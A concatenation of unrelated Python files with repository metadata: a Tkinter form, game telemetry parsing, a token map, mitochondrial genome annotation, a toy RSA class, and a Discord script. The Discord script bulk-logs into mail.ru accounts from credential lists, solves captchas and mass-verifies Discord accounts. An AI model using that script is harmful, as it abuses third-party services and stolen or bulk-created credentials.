cajaNombre = Entry(ventana, textvariable = nombre).place(x=160, y=60)
labelApellidoP = Label(ventana, text="Apellido Paterno", bg=colorFondo, fg=colorLetra).place(x=50, y=100)
cajaApellidoP = Entry(ventana, textvariable = apellidoP).place(x=160, y=100)
labelApellidoM = Label(ventana, text="Apellido Materno", bg=colorFondo, fg=colorLetra).place(x=50, y=140)
cajaApellidoM = Entry(ventana, textvariable = apellidoM).place(x=160, y=140)
labelCorreo = Label(ventana, text="Correo", bg=colorFondo, fg=colorLetra).place(x=50, y=180)
cajaCorreo = Entry(ventana, textvariable = correo).place(x=160, y=180)
labelTelefono = Label(ventana, text="Telefono", bg=colorFondo, fg=colorLetra).place(x=50, y=220)
cajaTelefono = Entry(ventana, textvariable = telefono).place(x=160, y=220)
labelEliminar = Label(ventana, text="Telefono", bg=colorFondo, fg=colorLetra).place(x=370, y=60)
spinTelefono = Spinbox(ventana, textvariable=conteliminar).place(x=450,y=60)
btnGuardar = Button(ventana, text="GUARDAR", command=guardar, bg="#009", fg="white").place(x=180, y=260)
btnEliminar = Button(ventana, text="ELIMINAR", command=eliminar, bg="#009", fg="white").place(x=490, y=100)
mainloop()
| [
"luisgomez24g@gmail.com"
] | luisgomez24g@gmail.com |
c34c9a8ff10d27423ec58705c27a4ad422e7a08a | 98897a706b48f40ac34cf6d1722e086bd87043ff | /analysis_everglades/first_unit_lost_script.py | 3c59c74c4714f5be0fe1fa913f493aef13a837fb | [] | no_license | shaunhyp57/everglades | dae28fb1695443fb6bb0a1e7c81d50b320dba400 | e4aab93d7fe8147ed3917605b2755ed429884b84 | refs/heads/master | 2022-04-25T03:07:24.999084 | 2020-04-27T16:32:12 | 2020-04-27T16:32:12 | 238,527,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | import os
import csv
rootdir = 'game_telemetry'
def list_files(rootdir):
Unit_Type_Dict={"[Striker]":1,"[Tank]":2,"[Controller]":3}
list=[-1,1]
r = []
i=0
fileCSV = open("firstUnitLost_target4_randact","w")
fileCSV.write("numberOfTurns"+','+
"winType"+','+"player_0"+','+
"player_1"+','+"unitLossTurn"+','+
"unitLostPlayer"+","+"unitLostType"+','+
"combinedStat"+','+"winner"+'\n')
for root, dirs, files in os.walk(rootdir):
dirs.sort()
files.sort()
for name in files:
fullPath=(os.path.join(root, name))
#print(fullPath)
fullPathList=[]
fullPathList=fullPath.split('/')
current_File = str(fullPathList[3:])
current_File=current_File.replace('[','').replace(']','').replace("'",'')
if current_File == "Telem_GAME_Scores":
#print("current file is Telem_GAME_Scores")
TFG_List=get_Turns(fullPath)
if current_File == "Telem_GROUP_Disband":
#print("current file is Telem_GROUP_Disband")
TGD_List=get_dispand_info(fullPath)
#print("TGD List")
#print(TGD_List)
if current_File == "Telem_GROUP_Initialization":
#print("current file is Telem_GROUP_Initialization")
TFI_List=get_Initialization_info(fullPath)
#print(TFI_List)
if current_File == "Telem_PLAYER_Tags":
#print("current file is Telem_PLAYER_Tags")
#print("TFG Game_Scores: " + str(TFG_List))
#print("TGD Group Disband: " + str(TGD_List))
#print("TFI Group Init: " + str(TFI_List))
fileCSV.write(str(TFG_List[0])+','+
str(TFG_List[1])+','+
str(TFG_List[2])+','+
str(TFG_List[3])+','+
str(TGD_List[0])+','+
str(TGD_List[1])+','+str(Unit_Type_Dict.get(TFI_List[int(TGD_List[2])-1]))+','+
str(list[(int(TGD_List[1]))]*int((Unit_Type_Dict.get(TFI_List[int(TGD_List[2])-1]))))+','+
str(TFG_List[4])+'\n')
return r
def get_Turns(path):
game_scores_File = open(path,"r")
turn_info_list=[]
game_scores_File.readline()
#loop to iterate telemetry file
for row in game_scores_File:
tempRow={}
tempRow=row.split(",")
turns=tempRow[0]
type_Of_Win = tempRow[3]
player0score = tempRow[1]
player1score = tempRow[2]
if int(tempRow[1]) > int(tempRow[2]):
winner = 0
else:
winner = 1
turn_info_list.append(turns)
turn_info_list.append(type_Of_Win)
turn_info_list.append(player0score)
turn_info_list.append(player1score)
turn_info_list.append(winner)
game_scores_File.close()
return turn_info_list
def get_dispand_info(path):
dispand_info=open(path,'r')
dispand_info_list=[]
dispand_info.readline()
for row in dispand_info:
currentRow=[]
currentRow=row.split(",")
dispand_info_list.append(currentRow[0])
dispand_info_list.append(currentRow[1])
dispand_info_list.append(currentRow[2])
#print(dispand_info_list[1])
dispand_info.close()
return dispand_info_list
def get_Initialization_info(path):
initialization_info=open(path,'r')
initialization_info_list=[]
initialization_info.readline()
for row in initialization_info:
initialRow=[]
initialRow=row.split(",")
initialization_info_list.append(initialRow[4])
initialization_info.close()
return initialization_info_list
list_files(rootdir) | [
"shaunhyp57@knights.ucf.edu"
] | shaunhyp57@knights.ucf.edu |
f3ddd2dab3b5302c60af59e19d6cc65c0cfc96bf | 31973632967be3dd06db9ac86435665616228b0c | /xtoken_map.py | 6cfce894b796b4f34304dfa89074f750eea51c2a | [] | no_license | tanupoo/penguin | 2d5f2f0dac935856cbc1ca533c6255e14be020b1 | a2911319e2aa31e0550bc36bfda728564d86727b | refs/heads/main | 2023-05-25T17:54:10.608657 | 2023-05-24T00:14:28 | 2023-05-24T00:14:28 | 249,449,058 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,972 | py | from datetime import datetime, timedelta
from hashlib import sha256
from random import random
"""
xpath and token map.
- generate token.
- validate token.
- remove token if validated.
- house keeping the map.
"""
class XTokenMap():
def __init__(self, lifetime=7200, limit=1000, hard_limit=1300):
"""
check if the length of xtmap is less than the hard_limit.
if it exceeds, remove items matched with the following criteria.
1. remove items exceed the lifetime in seconds.
2. remove items until the length of xtmap become less than the limit.
"""
self.xtmap = {}
self.lifetime = lifetime
self.limit = limit
self.hard_limit = hard_limit
def _gen_token(self):
m = sha256()
m.update((str(random())+str(datetime.now().timestamp())).encode())
return m.hexdigest()
def _housekeeping(self):
# check hard limit.
if len(self.xtmap) < self.hard_limit:
return
# remove expired items.
for kv in list(self.xtmap.items()):
# delete map if it is older than a certain time.
now = datetime.now()
if now - timedelta(seconds=self.lifetime) > kv[1]["accessed"]:
self.xtmap.pop(kv[0])
# remove oldest items.
if len(self.xtmap) >= self.limit:
# don't need sorting because of python dict order.
self.xtmap = dict(list(self.xtmap.items())[:self.limit])
def generate_token(self, xpath=None):
self._housekeeping()
token = self._gen_token()
now = datetime.now()
self.xtmap.update({
token: {
"xpath": xpath,
"accessed": now,
"authed": False,
}
})
return token
def validate_token(self, token, xpath=None, remove_token=False,
check_authed=False):
"""
validate token.
remove token if successful.
"""
self._housekeeping()
# find the token.
v = self.xtmap.get(token)
if v is not None:
if xpath is not None:
# check if xpath is valid.
if xpath == v["xpath"]:
if check_authed is True and v["authed"] is False:
# check if authed if needed.
return False
if remove_token is True:
self.remove_token(token)
return True
else:
return False
else:
if remove_token is True:
self.remove_token(token)
return True
else:
return False
def token_set_authed(self, token):
"""
set authed flag.
"""
v = self.xtmap.get(token)
if v is None:
raise ValueError("token is not valid.")
v["authed"] = True
def remove_token(self, token):
"""
remove entry indicated by token.
"""
for k in list(self.xtmap.keys()):
if k == token:
self.xtmap.pop(k)
break
else:
raise ValueError("token is not valid.")
def counts(self):
return len(self.xtmap)
if __name__ == "__main__":
import time
xtmap = XTokenMap()
t1 = xtmap.generate_token()
print(xtmap.validate_token(t1))
print(xtmap.validate_token("5ecd5c301ac34bca3a57709edf3e1e9e07f9fcc07369bd989141951e12df8e45"))
xtmap.remove_token(t1)
#
xtmap = XTokenMap(limit=5, hard_limit=10)
for i in range(15):
xtmap.generate_token()
print("len=", xtmap.counts())
#
xtmap = XTokenMap(lifetime=5, limit=5, hard_limit=7)
for i in range(10):
xtmap.generate_token()
print("len=", xtmap.counts())
time.sleep(1)
| [
"github-shoichi@tanu.org"
] | github-shoichi@tanu.org |
5ae1186a482bd5ce72bb88b91a51591fce531a64 | b9b347f7c6807942356856fd145d12bfd890c9ae | /discord_verify.py | 7fd080491dfc34ec12b22abecf63085781e1580c | [
"MIT"
] | permissive | nagjakolsitimang/AAAA | 48411dab8bf708acfc881a5b53d07a58d0166514 | 99190662ea7ebe60f05ddcbdf4aff2cc2647816c | refs/heads/master | 2020-03-20T11:45:28.383784 | 2018-06-14T21:49:40 | 2018-06-14T21:49:40 | 137,411,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,343 | py | import sys
import re
import recaptcha
import requests
import json
import random
import Queue
import threading
emails_q = Queue.Queue()
def debug(text, conf):
if conf['debug']:
print "[DEBUG] "+str(text)
def read_configurations():
try:
conf = json.loads(open('discord_verify.json','r').read())
print "Loaded configs with values:"
print "\temails_file: " + str(conf['emails_file'])
print "\toutput_file: " + str(conf['output_file'])
print "\ttimeout: " + str(conf['timeout'])
print "\tnb_threads: " + str(conf['nb_threads'])
print "\tdebug: " + str(conf['debug'])
return conf
except Exception, e:
print e
sys.exit(1)
def array_to_queue(arr, q):
for i in arr:
q.put(i)
return q
def save_user(email, password, conf):
debug("saving user", conf)
output = open(conf['output_file'], 'a')
output.write(":".join(
[email, password]
)+"\n")
output.close()
def get_headers():
return {
'user-agent': 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16',
'Host': 'discordapp.com',
'Accept': '*/*',
'Accept-Language': 'en-US',
'Content-Type': 'application/json',
'Referer': 'https://discordapp.com/register',
'DNT': '1',
'Connection': 'keep-alive'
}
def verify(email, password, conf):
debug("verifying : "+email+" "+password, conf)
headers = get_headers()
ss = requests.Session()
debug("opening email", conf)
response = ss.post('https://auth.mail.ru/cgi-bin/auth', {
'post':None,
'mhost': 'mail.ru',
'login_from': None,
'Login': email,
'Domain': 'mail.ru',
'Password': password})
text = response.text.encode('utf-8').replace("\n","")
debug("trying to find link", conf)
open('MAILRU.html','w').write(text)
link = re.findall('id: "(\d+)",\s*prev:\s*"\d*",\s*next:\s*"\d*",\s*subject:\s*u\("Verify Email Address for Discord"\)',text)[0]
debug("found email link: "+link, conf)
response = ss.get('https://m.mail.ru/message/{0}'.format(link))
activation = re.findall('url=(https%3A%2F%2Fdiscordapp.com%2Fverify[^"]+)"', response.text.encode('utf-8'))[0]
activation = requests.utils.unquote(activation)
debug("found activation link: "+activation, conf)
token = re.findall("token=([^&]+)&", activation)[0]
debug("token is "+token, conf)
debug("opening activation link", conf)
ss.get(activation,
headers=headers,
timeout=conf['timeout'])
debug("fetching a captcha", conf)
captcha = recaptcha.GetCaptcha()
payload = {
'token' : token,
'captcha_key' : captcha
}
debug("sending payload:"+str(payload), conf)
response = ss.post(
'https://discordapp.com/api/v6/auth/verify',
json=payload,
headers=headers,
timeout=conf['timeout']
)
return True
def worker(conf):
debug("worker started", conf)
while not emails_q.empty():
email_pwd = emails_q.get()
emails_q.task_done()
email = email_pwd.split(":")[0]
e_password = email_pwd.split(":")[1]
try:
verify(email, e_password, conf)
save_user(email, e_password, conf)
except Exception, e:
print str(e)
debug("could not verify "+str(e.message), conf)
def main():
global emails_q
print "Starting"
conf = read_configurations()
data = [x.rstrip() for x in open(conf['emails_file'], 'r').readlines()]
emails = []
alreadydone = [x.rstrip() for x in open(conf['output_file'], 'r').readlines()]
for _ in data:
try:
email = _.split(':')[2] + ':' + _.split(':')[3]
if email not in alreadydone:
emails.append(email)
except:
pass
emails_q = array_to_queue(emails, emails_q)
tx = []
debug("Starting "+str(conf['nb_threads'])+" threads", conf)
for i in range(conf['nb_threads']):
mT = threading.Thread(target=worker, args=(conf, ))
mT.start()
tx.append(mT)
for t in tx:
t.join()
print "Finished"
if __name__ == "__main__":
while 1:
main()
| [
"noreply@github.com"
] | noreply@github.com |
1df7189cda9f9e9f78c0932201794628cc7a950a | 5de989040aeebc58047ee43f9f518393b1f4ff15 | /run_app.py | bf9eb34b3468066186f84902e572deb55b784e50 | [] | no_license | bosefalk/WFB-simulation | 5e8750182abeeb29fe7feab6afaef98a725149d6 | 0cb967534b0b805d5a52932fa58712f9974fdc91 | refs/heads/master | 2021-01-19T04:49:59.974014 | 2017-04-29T13:33:15 | 2017-04-29T13:33:15 | 87,400,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | from flask_main import app
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0') | [
"bosefalk@gmail.com"
] | bosefalk@gmail.com |
0d538a63482a65ea73dac9def3fb1b15e7b85c5b | bd3a0f9e15d6258b6cdfd8288b9d31379a941fac | /Medium/ContainerWithMostWater.py | 685ac1b98d20361f356423dc354aec4694912a88 | [] | no_license | denmarktayong7/LeetCode | e9b15a94efd9f93708f6ee6c0bb7ae76bc3983d4 | ca1c4a20320d66d1dea2c96fda456550d94e46fe | refs/heads/master | 2021-07-07T17:10:31.087943 | 2021-03-27T15:54:42 | 2021-03-27T15:54:42 | 233,178,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | class Solution:
def maxArea(self, height: List[int]) -> int:
bestArea = 0
pt1 = 0 #left pointer
pt2 = len(height) - 1 #right pointer
while(pt1 < pt2):
bestArea = max(bestArea, min(height[pt1], height[pt2]) * (pt2 - pt1))
if(height[pt1] > height[pt2]):
pt2 -= 1
else:
pt1 += 1
return bestArea
| [
"noreply@github.com"
] | noreply@github.com |
cf64837efa8aa84185b39f8448f6d16429850db7 | 4523542cf50113daf5ee59f1d59a46309ab99c89 | /anno.py | d1d944f3a0ef4ca92ddfb51b6de52184e5b41636 | [] | no_license | Runsheng/mitovar | 798da8447387092cbf98329cc8ad10948b65bce0 | f514fe0bce7b2bc96e282a5d2e340d36e306ef8d | refs/heads/master | 2022-01-11T12:20:48.080720 | 2022-01-04T03:18:55 | 2022-01-04T03:18:55 | 78,615,609 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 17,005 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2016/12/9 13:08
# @Author : Runsheng
# @File : anno.py
"""
Try to annotate the assembly of mito scafs, including the tRNA, rRNA and coding genes
Find the tRNA-phe, set it as the start point of the new reference genome.
Get the annotation for rRNA and tRNA, store as .tbl file, used for tbl2asn submission
Get the annotation for CDS and proteins, store as .tbl file, used for tbl2asn submission.
Write the CDS and protein sequence out as fasta file, together with the orthology table, used for tree construction.
"""
from utils import fasta2dic, chr_select, myexe, dic2fasta
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
from Bio import SearchIO, SeqIO, SeqUtils
import os
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
##################CDS part
def exonerate_wrapper(query, target, outfile=False, geneticcode=5, score=100, bestn=None):
"""
--geneticcode 5
return is a outfile name in relative path
todo: using stringIO to hinder the file IO
"""
if bestn is None:
bestn = len(fasta2dic(target)) # default, output one region for one query
exonerate_cmd = "exonerate {query} {target} \
--geneticcode {geneticcode} \
--score {score} \
--bestn {bestn} \
".format(
query=query, target=target,
geneticcode=geneticcode,
score=score,
bestn=bestn,
)
out = myexe(exonerate_cmd)
## trigger to write the outfile to disk
if outfile:
outname = query.split("/")[-1].split(".")[0] + ".exonerate"
with open(outname, "w") as fw:
fw.write(outname)
return out
def exonerate_parser(exonerate_file):
"""
parser the exonerate result, and return the position of the feather in 4-col bed format
4 col bed4: [chro, start,end, name], example ["seq1", 1, 55, "trnP"]
:param query:
:param exonerate_file:
:param prefix:
:return: list of bed4
"""
# fw=open(tbl_outname, "w") # change IO to list store
bed4 = []
texts = SearchIO.parse(StringIO(exonerate_file), format="exonerate-text")
try:
for record in texts:
for hsp in record:
for s in hsp:
# the biopython.SearchIO interval is 0 based [start, end), so start+1, end+0 to get 1 based coords
table_4 = [s.fragment.query_id, s.fragment.query_start + 1, s.fragment.query_end, s.fragment.hit_id]
bed4.append(table_4)
except ValueError as e:
pass
bed4.sort()
return bed4
def exonerate_parser_write(query, exonerate_file, prefix=None):
"""
parser the exonerate result, and return the protein and cds file
modification: add the position to the name of the cds and pro, use space to add interval
:param query:
:param exonerate_file:
:param prefix:
:return:
"""
ref_dict = fasta2dic(query)
if prefix is None:
prefix = query.split(".")[0]
p_outname = (prefix + "_exonerate_p.fa")
cds_outname = (prefix + "_exonerate_cds.fa")
fw_p = open(p_outname, "w")
fw_cds = open(cds_outname, "w")
texts = SearchIO.parse(StringIO(exonerate_file), format="exonerate-text")
for record in texts:
for hsp in record:
for s in hsp:
# print(s.fragment.hit_id)
name_str = ">" + s.fragment.hit_id
name_cds, cds_str = chr_select(ref_dict, s.fragment.query_id, s.fragment.query_start,
s.fragment.query_end)
p_str = str(s.fragment.query.seq)
# print(name_cds)
fw_p.write(name_str + " " + name_cds + "\n" + p_str + "\n")
fw_cds.write(name_str + " " + name_cds + "\n" + cds_str + "\n")
return cds_outname, p_outname
def _exon_corrector(cds_outname, p_outname, prefix=None):
"""
try to merge the cds and the protein sequence together,
if, for example, the ND3 is divided into two part,
The easiest way is to just add the two segment together
:param cds_outname:
:param p_outname:
:return:
todo: unfinished, only chose the longest sequence
"""
cds_d = {}
p_d = {}
if prefix is None:
prefix = cds_outname.split("_")[0]
for cds, p in zip(SeqIO.parse(cds_outname, "fasta"), SeqIO.parse(p_outname, "fasta")):
name, anno = cds.description.split(" ")
__ = anno.split(":") # unused
key = "#".join([prefix, name])
if key in cds_d.keys():
seq_old = cds_d[key]
if len(cds) > len(seq_old):
cds_d[key] = cds
p_d[key] = p
else:
pass
else:
cds_d[key] = cds
p_d[key] = p
dic2fasta(cds_d, "_".join([prefix, "cds", "corr.fasta"]))
dic2fasta(p_d, "_".join([prefix, "p", "corr.fasta"]))
def genbank_parser(gbfile, prefix=None):
"""
from gb file, get the cds and protein sequence
and rename them as #
:param gbfile: genbank file
:return:
"""
cds_d = {}
p_d = {}
if prefix is None:
prefix = gbfile.split(".")[0]
for record in SeqIO.parse(gbfile, format="genbank"):
for i in record.features:
if i.type == "CDS":
name = "".join(i.qualifiers["gene"])
p = "".join(i.qualifiers['translation'])
cds = str(i.extract(record.seq))
key = "#".join([prefix, name])
if key in cds_d.keys():
seq_old = cds_d[key]
if len(cds) > len(seq_old):
cds_d[key] = cds
p_d[key] = p
else:
pass
else:
cds_d[key] = cds
p_d[key] = p
dic2fasta(cds_d, "_".join([prefix, "cds", "corr.fasta"]))
dic2fasta(p_d, "_".join([prefix, "p", "corr.fasta"]))
def flow_exon(query, target, outfile=None, geneticcode=5, prefix=None):
"""
get the CDS region and translated protein after using,
the default geneticcode is 5, the invertebrate mitochondrial code
:param query:
:param target:
:param outfile:
:param geneticcode:
:param prefix:
:return:
"""
outfile = exonerate_wrapper(query, target, outfile, geneticcode)
cds_out, p_out = exonerate_parser_write(query, outfile, prefix)
# _exon_corrector(cds_out, p_out) # in default model, no need to select again
####rrna
def rrna_tbl_get(query, target, outfile=False, geneticcode=5):
"""
rrna bed 4
"""
out = exonerate_wrapper(query, target, outfile, geneticcode)
tbl_rrna = exonerate_parser(out)
return tbl_rrna
def cds_tbl_get(query, target, outfile=False, geneticcode=5):
out = exonerate_wrapper(query, target, outfile, geneticcode)
tbl_cds = exonerate_parser(out)
return tbl_cds
def get_cogfile(fastafile, wkdir=None, out="m20.txt"):
"""
cat all the cds/or protein together, and get the cog file used for ete alignment
:param fastafile: the comibined fasta file
:param out: the name indicaiting the orthologs, like: "ppac#ND4\tcele#ND4\nppac#ND5\tcele#ND5\n"
:return:
"""
if wkdir is None:
wkdir = os.getcwd()
os.chdir(wkdir)
fa_d = fasta2dic(fastafile)
fw = open(out, "w")
name_d = {}
for k in fa_d.keys():
suffix = k.split("#")[1]
try:
name_d[suffix].append(k)
except KeyError:
name_d[suffix] = []
name_d[suffix].append(k)
for k, v in name_d.iteritems():
fw.write("\t".join(v))
fw.write("\n")
return out
#################### end of CDS part
#### end of rrna
#################### trna part
def mitfi_wrapper_trna(fastafile, MITFIPATH=None, prefix=None):
"""
mitfi.jar in in $MITFIPATH=./bins
:return:teh filename of mitfi run
"""
if MITFIPATH is None:
path = os.path.dirname(__file__)
MITFIPATH = os.path.join(path, "bins", "mitfi")
# print MITFIPATH
jarfile = os.path.join(MITFIPATH, "mitfi.jar")
mitfi_cmd = "java -jar {jarfile} {fastafile}".format(
jarfile=jarfile, fastafile=fastafile)
trna_out = myexe(mitfi_cmd)
print(trna_out)
if prefix is None:
prefix = ".".join(fastafile.split("/")[-1].split(".")[0:-1])
with open(prefix + "_trna.txt", "w") as fw:
fw.write(trna_out)
return prefix + "_trna.txt"
def trnafile_parser(trnafile):
bed4_l = []
with open(trnafile, "r") as fr:
for line in fr.readlines():
if line.startswith("#"):
pass
else:
terms = line.strip().split("\t")
header, start, stop, score, evalue, AC, AA, model, strand = terms
seq1 = AA[0]
bed4_l.append([header, int(start), int(stop), seq1])
return bed4_l
def tbl_format(bed4_rrna, bed4_cds, bed4_trna):
"""
tbl format :
---
>refname # once
---
for each term: 2line anntation
start\tend\ttype\n\t\t\tkey\tvalue\n
---
trna and rrna shows once,
but cds show as gene and cds
:param bed4_rrna:
:param bed4_cds:
:param bed4_trna:
:return:
"""
# sanity check
if bed4_rrna[0][0] == bed4_cds[0][0] == bed4_trna[0][0]:
ref = bed4_rrna[0][0]
else:
return "Error, annotations not from the same reference!"
#
type_dict = {}
for x in bed4_rrna:
type_dict[x[3]] = "rRNA"
for x in bed4_trna:
type_dict[x[3]] = "tRNA"
for x in bed4_cds:
type_dict[x[3]] = "CDS"
bedall = sorted(bed4_rrna + bed4_cds + bed4_trna)
####todo: add the position for the non-coding region as NCR, cutoff =gap>20
####
####
out_l = []
for line in bedall:
chro, start, end, anno = line
if type_dict[anno] == "tRNA":
seq3 = "tRNA-" + str(SeqUtils.seq3(anno))
line2w = "{start}\t{end}\t{type}\n\t\t\t{key}\t{value}\n".format(
start=start, end=end, type="tRNA", key="product", value=seq3)
elif type_dict[anno] == "rRNA":
line2w = "{start}\t{end}\t{type}\n\t\t\t{key}\t{value}\n".format(
start=start, end=end, type="rRNA", key="product", value=anno)
elif type_dict[anno] == "CDS":
line2w_1 = "{start}\t{end}\t{type}\n\t\t\t{key}\t{value}\n".format(
start=start, end=end, type="gene", key="gene", value=anno)
line2w_2 = "{start}\t{end}\t{type}\n\t\t\t{key1}\t{value1}\n\t\t\t{key2}\t{value2}\n".format(
start=start, end=end, type="CDS",
key1="product", value1=anno,
key2="transl_table", value2=5)
line2w = "".join([line2w_1, line2w_2])
out_l.append(line2w)
return out_l
def _cmsearch_wrapper_rrna(fastafile, MITFIPATH=None):
"""
todo: too slow to be practical, maybe change to INFERNAL 1.1 and try
mitfi.jar in in $MITFIPATH=./bins
:return:teh filename of mitfi run
"""
if MITFIPATH is None:
path = os.path.dirname(__file__)
MITFIPATH = os.path.join(path, "bins", "mitfi")
# print MITFIPATH
jarfile = os.path.join(MITFIPATH, "mitfi.jar")
rrna_cm = os.path.join(os.path.dirname(__file__), "bins", "mitfi", "r_rna.cm")
mitfi_cmd = "java -jar {jarfile} -cm {rrna_cm} -top {fastafile}".format(
jarfile=jarfile, fastafile=fastafile, rrna_cm=rrna_cm)
rrna_out = myexe(mitfi_cmd)
print(rrna_out)
prefix = fastafile.split("/")[-1].split(".")[0]
with open(prefix + "_rrna.txt", "w") as fw:
fw.write(rrna_out)
return prefix + "_rrna.txt"
def get_tnra_pro(fastafile, mitfi_out):
"""
re_order the mtDNA fastafile, write a new fastefile start with trna P (Phe)
:param fastafile:
:param MITFIPATH:
:return:
"""
fasta_d = fasta2dic(fastafile)
if len(fasta_d) != 1:
print("Check the fasta file and make it continues one!")
return None
###### get the start point of trna_Pro and the strand
trna_pro_start = None
trna_pro_socre = 0
strand = "+"
fr = open(mitfi_out, "r")
for line in fr.readlines():
terms = line.strip().split("\t")
header, start, stop, score, evalue, AC, AA, model, strand = terms
if AA == "P" and float(score) > trna_pro_socre and float(evalue) <= 0.001:
if strand == "+":
trna_pro_start = int(start)
elif strand == "-":
trna_pro_start = int(stop)
trna_pro_socre = score
fr.close()
return (trna_pro_start, strand)
def re_order(fastafile, newstart, strand="+", outfasta=None):
"""
:param fastafile: the sequence which only have one sequence
:param newstart: new start point for the fasta sequence, 1 based
:param strand": "+" or "-"
:param outfasta:
:return:
"""
fasta_d = fasta2dic(fastafile)
######
if len(fasta_d) != 1:
print("Check the fasta file and make it continues one!")
return None
chro = fasta_d.keys()[0]
seq = fasta_d.values()[0]
######
###### re-order the new file
if outfasta is None:
prefix = fastafile.split("/")[-1].split(".")[0]
outfasta = prefix + "_ordered.fasta"
########
if strand == "+":
pass
if strand == "-":
newstart = len(seq) - newstart + 1
seq = seq.reverse_complement()
fasta_d = {chro: seq}
print(newstart)
frg_1 = chr_select(record_dict=fasta_d, chro=chro, start=newstart - 1, end=len(seq))[1]
frg_2 = chr_select(record_dict=fasta_d, chro=chro, start=0, end=newstart - 1)[1]
seq_new = "".join([frg_1, frg_2])
with open(outfasta, "w") as fw:
fw.write(">" + chro + "_re" + "\n")
fw.write(seq_new)
fw.write("\n")
return outfasta
def flow_re_order(fastafile, MITFIPATH=None, outfasta=None):
mitfi_out = mitfi_wrapper_trna(fastafile, MITFIPATH)
newstart, strand = get_tnra_pro(fastafile, mitfi_out)
outfasta = re_order(fastafile, newstart, strand, outfasta)
return outfasta
#### flow for tbl generation
def pre_fsa(fastafile, spe_name=None, out=None):
"""
The species name should be provided in the running or
just rename the fastafile to contain the species name
prepare the fsa file for the tbl2asn prog
the fsa file should:
- have the header line contains the spe information
- end with ".fsa"
:param fastafile:
:param spe_name:
:param out:
:return:
"""
fa_d = fasta2dic(fastafile)
if spe_name is None:
spe_name = fastafile.split(".")[0]
if out is None:
out = spe_name + ".fsa"
fastaname = spe_name.replace(" ", "_") # in case the species name contains space
# give a mtDNA header line for the fsa file, ready for the submission
header = ">{fastaname} [organism={spe_name}] [chromosome=mt] [moltype=genomic DNA] " \
"[gcode=5] [Topology=Circular] [Completedness=Complete] " \
"{spe_name} mitochondrion, complete genome.".format(
fastaname=fastaname, spe_name=spe_name)
with open(out, "w") as fw:
fw.write(header)
fw.write("\n")
fw.write(str(fa_d.values()[0].seq))
fw.write("\n")
return out
def flow_tbl(fasta_order, cds_ref, r_ref, spe_name=None, MITFIPATH=None):
# r_ref = "/home/zhaolab1/data/mitosra/dna/anno/exon/ref/rrna.fasta"
# cds_ref = "/home/zhaolab1/data/mitosra/dna/anno/exon/ref/celmt_p.fasta"
# fasta_order=flow_re_order(fastafile, MITFIPATH=MITFIPATH)
prefix = ".".join(fasta_order.split(".")[0:-1])
if spe_name is None:
spe_name = prefix
trnafile = mitfi_wrapper_trna(fasta_order, MITFIPATH, prefix=prefix)
bed4_trna = trnafile_parser(trnafile)
bed4_rrna = rrna_tbl_get(fasta_order, r_ref)
bed4_cds = cds_tbl_get(fasta_order, cds_ref)
tbl_out = tbl_format(bed4_rrna, bed4_cds, bed4_trna)
fsa_name = pre_fsa(fasta_order, spe_name)
headstr = ">Feature\t" + fsa_name + "\n"
tbl_out = [headstr] + tbl_out
tbl_name = spe_name + ".tbl"
with open(tbl_name, "w") as fw:
fw.write("".join(tbl_out))
print("Using {fsa_name} and {tbl_name} for your tbl2asn submission.".format(
fsa_name=fsa_name, tbl_name=tbl_name
))
return fsa_name, tbl_name
if __name__ == "__main__":
os.chdir("/home/zhaolab1/data/mitosra/dna/wkdir/1561998")
r_ref = "/home/zhaolab1/data/mitosra/dna/anno/exon/ref/rrna.fasta"
cds_ref = "/home/zhaolab1/data/mitosra/dna/anno/exon/ref/celmt_p.fasta"
out = flow_re_order("1561998.fasta")
flow_tbl(out, cds_ref, r_ref, spe_name="Caenorhabditis tropicalis")
| [
"runsheng.lee@gmail.com"
] | runsheng.lee@gmail.com |
8591255bf99ff7a2d00d56cd1fdc18d76b93e748 | 6004bf293916050951e7706f8c5f51d8c9ba32e0 | /crypto/little_rsa.py | fcdc86763a98829cf06beb1e193de8b2be527ef8 | [] | no_license | fuckualreadytaken/ctf | ecb75ddbd28c9f0cf7ab743c205291cc21d0699b | 76843cdb91f4747ad1b92c30c7c4c1962605aa90 | refs/heads/master | 2021-04-15T19:05:53.325278 | 2018-08-13T14:51:28 | 2018-08-13T14:51:28 | 126,860,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,469 | py | #! /usr/bin/env python
# coding=utf-8
import random
import math
def produce_odd(start, end):
return random.randrange(start + 1, end, 2)
def ModExp(n, k, m):
"""This method is use to calculate the big Modular Exponentiation"""
a = list(bin(k))[2:]
a.reverse()
s = 1
for i in a:
if i == '1':
s = (s * n) % m
n = (n * n) % m
return s
def euclid(a, b):
"""(a,b)"""
while b != 0:
t = b
b = a % b
a = t
return a
class Euclid:
def __init__(self, num1, num2):
self.num1 = num1
self.num2 = num2
self.c = []
self.p = []
self.q = []
while self.num2 != 0:
self.c.append(self.num1)
self.p.append(self.num2)
x = self.num1 / self.num2
self.q.append(x)
r = self.num1 % self.num2
self.num1 = self.num2
self.num2 = r
self.q.pop(-1)
def method1(self):
print "\t{0:<4}".format(self.num1)
self.c.reverse()
self.p.reverse()
index = 1
if len(self.c) == 1:
index = 0
c_x = 1
p_x = -(self.c[index] / self.p[index])
while len(self.c) - 1 >= index:
print "\t{0:>8}{1}x({2})+{3}x({4})".format("=", self.c[index], c_x, self.p[index], p_x)
if len(self.c) - 1 == index:
break
tmp = c_x
c_x = p_x
p_x = tmp - (self.c[index + 1] / self.p[index + 1] * p_x)
index += 1
return c_x
class RSA:
small_primes = [2, 3, 5, 7, 11, 13, 17, 19]
count = 0
version = 1.0
e = 17
def __init__(self):
self.pk = []
self.sk = []
def small_primes_test(self, num):
for small_prime in self.small_primes:
if num % small_prime == 0:
print "\t\t\033[1;31;0m[-]Small primes test not passed."
